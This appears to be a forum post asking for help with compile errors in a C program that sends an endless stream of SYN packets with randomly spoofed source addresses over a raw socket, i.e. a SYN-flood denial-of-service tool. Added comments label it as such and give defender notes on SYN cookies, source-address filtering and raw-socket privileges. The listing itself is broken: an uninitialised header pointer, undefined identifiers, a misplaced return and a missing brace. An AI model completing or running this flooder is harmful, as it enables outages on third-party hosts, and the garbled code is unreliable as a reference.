源代码如下:
#include<sys/socket.h>
#include<arpa/inet.h>
#include<netinet/in.h>
#include<netdb.h>
#include<ctype.h>
#include<stdio.h>
#include<stdlib.h>
#include<netinet/ip.h>
#include<netinet/tcp.h>
#include<errno.h>
#include<unistd.h>
#include<sys/types.h>
#include<fcntl.h>
/*******************************************
*write_syn(int sockfd,struct sockaddr_in *addr)*
*******************************************/
/*
 * write_syn - emit SYN-only TCP segments with a hand-built IP header, forever.
 *
 * What the visible code does: one IPv4 + TCP header pair is laid out in a
 * stack buffer, only TH_SYN is set, and the loop at the bottom has no exit
 * condition. Before every sendto() a fresh random() value is written into
 * ip_src, and nothing in this listing ever reads a reply, so no handshake
 * can complete. That is the traffic pattern of a SYN flood with spoofed
 * source addresses (a denial-of-service pattern), not of a client or a
 * port scanner.
 *
 * Defender notes: the constants below give this traffic a recognisable
 * shape on the wire - source port 1500, IP ID 0, ack 0, data offset 5
 * (no TCP options), bare SYN, and a source address that changes on every
 * packet. The usual mitigations are SYN cookies and backlog tuning on the
 * listening host, per-source/per-destination SYN rate limiting, and
 * source-address validation at the network edge (BCP 38 / uRPF) so that
 * arbitrary ip_src values cannot leave the originating network.
 *
 * The page this listing comes from reports that it fails to compile; the
 * code is documented here exactly as posted and is not repaired.
 *
 * sockfd: socket to send on; main() in this listing creates it with
 *         SOCK_RAW and enables IP_HDRINCL.
 * addr:   destination; its sin_addr is copied into ip_dst and it is also
 *         passed to sendto().
 */
void write_syn(int sockfd,struct sockaddr_in *addr)
{
/* presumably sized for a 20-byte IP header plus a 20-byte TCP header - TODO confirm */
char buf[56];
struct tcphdr *tcp;
struct ip *ip;
int len;
len=sizeof(struct ip)+sizeof(struct tcphdr);
bzero(buf,sizeof(buf));
/*tcp=(struct tcphdr*)(buf+sizeof(struct ip));*/
/* Fixed source port: a constant that a filter or detection rule can key on. */
tcp->th_sport=htons(1500);
tcp->th_dport=addr->port;
/* No srandom() call is visible in this listing, so random() values repeat from run to run. */
tcp->th_seq=random();
tcp->th_ack=0;
tcp->th_off=5;
/* SYN is the only flag set; the code never follows up with an ACK. */
tcp->th_flags=TH_SYN;
ip=(struct ip*)buf;
ip->ip_v=IPVERSION;
ip->ip_hl=sizeof(struct ip)>>2;
ip->ip_tos=0;
ip->ip_len=htons(on);
/* IP identification is a constant zero on every packet. */
ip->ip_id=0;
ip->ip_off=0;
ip->ip_ttl=TTL_OUT;
ip->ip_p=IPPROTO_TCP;
ip->ip_sum=0;
ip->ip_dst=addr->sin_addr;
/* Endless loop: no counter, delay or exit path; the sendto() result is ignored. */
for(;;){
/* Source address is overwritten with a random value per packet, i.e. spoofed. */
ip->ip_src.s_addr=random();
tcp->th_sum=tcpcksum(ip);
sendto(sockfd,buf,len,0,addr,sizeof(struct sockaddr_in));
}
}
/**********************************************************
tcpcksum(struct ip *ip)
**********************************************************/
/*
 * tcpcksum - checksum helper called by write_syn() for every packet.
 *
 * Appears intended to produce the TCP checksum over the pseudo-header
 * (addresses, protocol, length) followed by the TCP segment: it walks four
 * 16-bit words starting at ip_src, adds a protocol constant and a length,
 * walks the segment in 16-bit words, then folds the carries of the 32-bit
 * accumulator back into 16 bits.
 *
 * Documented exactly as posted; the page reports that the listing does not
 * compile, and nothing here has been repaired.
 *
 * ip:      pointer to the IP header; the TCP header is assumed to follow it
 *          directly (see the ip+1 below).
 * returns: the low 16 bits of the folded accumulator.
 */
unsigned short tcpcksum(struct ip*ip)
{
struct tcphdr *tcp;
unsigned short *sptr,len;
unsigned long tcksum;
int i;
tcksum=0;
/* TCP header is taken to start immediately after one struct ip. */
tcp=(struct tcphdr*)(ip+1);
/* Pseudo-header part: four 16-bit words beginning at the source address. */
sptr=(unsigned short *)ip->ip_src;
for(i=0;i<4;i++)
tcksum+=sptr++;
sptr=(unsigned short *)tcp;
/* Length value derived from the ip_len and ip_hl header fields. */
len=ip->ip_len-ip->ip_hl<<2;
tcksum+=IPPROTO +len;
/* Odd length: a zero byte is written after the segment and the length rounded up. */
if(len%2){
((char*)tcp)[len]=0;
len+=1;
}
/* Convert the byte count into a count of 16-bit words. */
len>>=1;
for(i=0;i<len;i++)
{
tcksum+=*sptr++;
/* Fold the upper 16 bits of the accumulator into the lower 16. */
tcksum=(tcksum>>16)+(tcksum&0xffff);
tcksum+=(tcksum>>16);
return(short)(tcksum&0xffff);
}
/*
 * main - resolve a destination, open a raw socket and hand it to write_syn().
 *
 * Takes two arguments: argv[1] is an address or host name, argv[2] a port.
 * (The usage string mentions only "port", although argc must be 3.)
 *
 * Defender notes: the program depends on a raw socket with IP_HDRINCL, which
 * is what lets write_syn() supply its own IP header, including the source
 * address. On Linux, creating such a socket needs root or CAP_NET_RAW, so
 * withholding that capability from ordinary accounts and containers stops
 * code like this from running at all. write_syn() has no return path in this
 * listing, so control never comes back here.
 */
int main(int argc,char *argv[])
{
int sockfd;
struct sockaddr_in addr;
struct hostent *he;
int on=1;
if(argc!=3){
printf("usage:syn port \n");
exit(1);
}
bzero(&addr,sizeof(addr));
addr.sin_family=AF_INET;
/* atoi() gives no error indication; the port argument is not validated. */
addr.sin_port=htons(atoi(argv[2]));
/* Try a dotted-quad literal first, then fall back to a name lookup. */
if(inet_aton(argv[1],&addr.sin_addr)==0){
he=gethostbyname(argv[1]);
if(he==NULL){
printf("host name error:%s %s\n",argv[1],hstrerror(h_errno));
exit(1);
}
addr.sin_addr=*(struct in_addr *)*he->h_addr_list[0];
}
/* Raw socket: this is the privileged step (root or CAP_NET_RAW on Linux). */
sockfd=socket(AF_INET,SOCK_RAW,0);
if(sockfd<0){
printf("sock error:%s \n",strerror(errno));
exit(1);
}
/* IP_HDRINCL: the caller supplies the IP header itself. Return value is not checked. */
setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
/*
 * NOTE(review): presumably meant as a privilege drop after the raw socket is
 * open, but it sets the uid to the numeric process id rather than to a chosen
 * unprivileged account, and the result is not checked - not a sound pattern.
 */
setuid(getpid());
write_syn(sockfd,&addr);
}
编译出错如图: